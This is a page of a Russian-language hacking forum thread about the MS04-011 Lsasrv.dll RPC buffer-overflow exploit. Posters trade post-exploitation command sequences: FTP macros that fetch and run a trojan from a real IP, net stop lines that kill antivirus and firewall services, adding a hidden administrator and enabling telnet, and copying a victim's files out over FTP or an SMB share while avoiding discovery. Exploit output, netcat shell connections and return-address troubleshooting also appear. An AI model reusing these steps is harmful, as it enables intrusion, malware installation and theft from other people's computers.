Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 14 15 16 17 18 19 След.
RSS
MS04011 Lsasrv.dll RPC buffer overflow remote exploit (PoC) with Un...
 
Цитата
Olegnet пишет:
В этот раз, компилить его нужно в VC++, а не в lcc.
У меня в LCC все компилится...
правда есть пару ошибок...
легкоисправляемых...
 
народ объясните, коннектчюсь к поломатой тачке через putty,
говорит conection refused.
 
Предлагаю макросы для SmallSoft LSA Service Exploit, которыми пользуюсь сам:

1. Выводит имена пользователей
Задержка 100мс
Текст:
cd\
cd docume~1
dir

2. Загружаем троянец
Задержка 100мс
Текст:
ftp
open 217.107.17.153
asdf
get \exp.exe
!exp.exe
bye

3. Убивает файерволы, антивирусы и проч.
Задержка 500мс
Текст:
net stop Mcshield
net stop "Norton Antivirus Service"
net stop "Panda Antivirus"
net stop "ZoneAlarm"
net stop "McAfee Framework Service"
net stop "SpIDer Guard for Windows NT"

4. Для приколистов :) Красивое вырубание компа
Задержка 5мс
Текст:
shutdown -s -t 60 -c "Здравствуй, моё солнышко! Ты просто не представляешь, как сильно я тебя люблю! Если ты узнаешь, от когоэто послание, моей радости не будет предела! Я ЛЮБЛЮ ТЕБЯ!!!" -f

Дерзайте! Придумаете макрос - постите на форум!
 
<font face="Arial, Helvetica, sans-serif"><font color=RED><font size="6"> Никто не знает почему эксплоит в большинстве случаев вызывает ошибку lsass и соответственно DOS, а не создаёт shell ??? </font></font></font>
 
Цитата
Protoss пишет:
Никто не знает почему эксплоит в большинстве случаев вызывает ошибку lsass и соответственно DOS, а не создаёт shell ???  

Неверный target.
 
Pro написал:Неверный target.

<font color=RED>Target верный: Targets:
        0 [0x01004600>: WinXP Professional    [universal> lsass.exe
        1 [0x7515123c>: Win2k Professional    [universal> netrap.dll
        2 [0x751c123c>: Win2k Advanced Server [SP4>       netrap .dll
У всех машин версия ОС точно известна (они все в моём центре стоят, много разных 2K,XP,Eng,Rus, разные SP)
А поведение различное (иногда shell, чаще DOS) и для каждой конкретной машины отличается стабильностью (если shell, то всегда shell а не DOS)
 Значит есть закономерность какая-то, нас 9 человек над этим думали, разобраться не можем, а интересно.
Вообщем если кто знает и может напишите в форум или на mail </font>Protoss@inbox.ru
 
2Protoss:
Видимо, большая часть машин имеет ОС W2K. Ведь эксплоит тестировался только на SP2 и SP4. На них будет производится установка шелла. Возможно, на остальных машинах с W2K, будет DoS.
 
To Pro:
Спасибо за участие, но такой вариант у нас был, дело в том, что на части машин XP SP0, XP SP1 и Eng и Rus также
вызывается DOS !
 
2Protoss:
Эксплоит компилировал сам или скачивал экзешник? Попробуй против WinXP SmallSoft LSA Service Exploit
 
В lcc все отлично компилиться, под Xp 2600 SP у меня все пошло
 
Люди,объясните ну я вот поимел shell и что??
Можно как нибудь с удаленного компа копировать себе на комп, если ДА, то как???? ОБЬЯСНИТЕ!!!!
плисс...а то я новичок в этом деле...
 
2Dima:
Закачать файл со свого компа:
Запускаешь на своем компе какой-нибудь FTP-сервер(Сойдёт от RPC Exploit GUI), а на шелле вбиваешь:

echo open ТВОЙ_IP>>a
echo asdf>>a
echo get C:\file.exe file.exe>>a
echo bye>>a
ftp -s:a

Скачать файл: то же самое, только 3-ю строку заменяешь на send file.exe>>a
 
Создай ТХТ файл запиши в него код, потом название переминую, что на конце было .с
И запусти!
Там сверху увидишь куда нажимать!
 
дайте plz отработанную версию lsasrv-expl.c хочеться под linux скомпилить, (кто-то давал http://bot.kurkino.org/lsasrv-expl.c линк не пашет :(
 
ссылочку на дадите на описание RPC и как его кодить, а то уже пару дней по инету ищу, не могу найти инфу. Желательно на русском и с примерами.
 
Цитата
^n0th1ng^ пишет:
На уд тачке //
net user USER PASS /add
net localgroup Administrators/Администраторы USER /add
net start telnet
--
коннект телнетом:
telnet VICTIM_IP
Вы намерены передать информацию о пароле на удаленный компьютер в зоне Интернет.
Это может быть небезопасно. Послать в любом случае(y/n):N
USER:1
PASS:1
*=========================================================== =====
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=========================================================== =====
C:\>copy \\80.XXX.XX.86\A\1.txt c:\
Скопировано файлов:         1.

C:\>dir c:\
Том в устройстве C не имеет метки.
Серийный номер тома: 2F32-18EC

Содержимое папки c:\

 24.04.2004   22:17    < ; ;DIR>   &n bsp;      MANIA
  13.03.2004   22:29    < ; ;DIR>   &n bsp;      Program  Files
 13.03.2004   22:18    < ; ;DIR>   &n bsp;      WINDOWS
  14.03.2004   12:03    < ; ;DIR>   &n bsp;      Downloads
 01.05.2004   14:36    &nb sp;    & nbsp;       0  1.txt // файл залит!
 24.03.2004   15:17    < ; ;DIR>   &n bsp;      C&M
  27.04.2004   16:00    < ; ;DIR>   &n bsp;      Spirit
  09.04.2004   18:00    < ; ;DIR>   &n bsp;      NVIDIA
 13.03.2004   20:00    &nb sp;    & nbsp;     108 CONFIG.SYS
13.03.2004   18:27    &nb sp;    & nbsp;     142 AUTOEXEC.BAT
 26.04.2004   22:14    < ; ;DIR>   &n bsp;      Documents  and Settings
                    3  ;   файлов       ;    &nbs p;  250 байт
                    8   папок   3 280 830 464 байт свободно

C:\>

Ну фиг знает... у меня тока через телн с шаров сливает/заливает, иначе кричит
Системная ошибка 5.
Отказано в доступе.
тоже столкнулся с таким траблом, решил так.
создаёшь у себя на тачке пользователя, например с именем LAMER и паролем SUXX, далее расшариваешь папочку (например upload$) у себя на тачке, в меню Доступ>Разрешения удаляешь группу "Все"(!!!), добавляешь пользователя "LAMER", выставляешь ему полный доступ(желательно высавить ограничение по кол-ву пользователей на одного, шоб жертва ненароком не влезла в аплоад, и не спалила тебя).
у жертвы в шелле пишешь net use \\<имя_твоего_компа>\upload$ /user:<имя_твоего_компа>\LAMER SUXX
ну а тут полный вперед... xcopy/hek *.* \\<имя_твоего_компа>\upload$ и т.д. и т.п.

когда буш отваливацца от жертвы желательно написать
net use \\<имя_твоего_компа>\upload$ /delete
иначе жертва могёт залезть в твой аплоад и просечь там свою инфу :)
 
Мля , я короче прогу sasrv-expl.ехе в FAR открываю она говорит типа неправильная команда или имя файла !
Чё такое ??? [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG]
 
Народ расскажте одну фишку. Юзаю я сплойт под 2к Соотвественно на удаленных 2к машинах шелл получаю без проблем. А вот если удаленная - ХП то сплойт только досит. Тут товарищь Sickle рассказал что надо сменить call esp на jmp. Расскажите поподробней. Нужно дизассемблить свой lsass.exe я так понимаю? Или  lsasrv.dll? Врод кода мнемоники колла ни там ни там нету. Очень было бы неплохо если бы сказали сразу адресс и какое значение сменить на 744fa92d. Или может я чего-то непросек, намекните хоть а? ;)
 
why ?
D:\www>hod -t 192.168.1.38 445

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.1.38: OS: WinXP Professional    [universal] lsass.exe
[*] Connecting to 192.168.1.38:445 ...
[-] Sorry, cannot connect to 192.168.1.38:445. Try again...

D:\www>hod -t 192.168.1.50 445

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.1.50: OS: WinXP Professional    [universal] lsass.exe
[*] Connecting to 192.168.1.50:445 ... OK
[*] Attacking ... OK

D:\www>nc 192.168.1.50 4444

D:\www>nc 192.168.1.50 445
^C
D:\www>hod -1 192.168.1.50 4444

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.1.50: OS:
[*] Connecting to 192.168.1.50:445 ... OK
[*] Attacking ... OK

D:\www>nc 192.168.1.50 4444
 
why can this does not it act ? be to possibly reason different version windowsa 2000 here ?
up to here mum only accessible expl for :
        0 [0x01004600]: WinXP Professional    [universal] lsass.exe
        1 [0x7515123c]: Win2k Professional    [universal] netrap.dll
        2 [0x751c123c]: Win2k Advanced Server [SP4]       netrap.dll
for EN and RU
and for PL ?
be this to possibly reason ?

I greet
Страницы: Пред. 1 ... 14 15 16 17 18 19 След.
Читают тему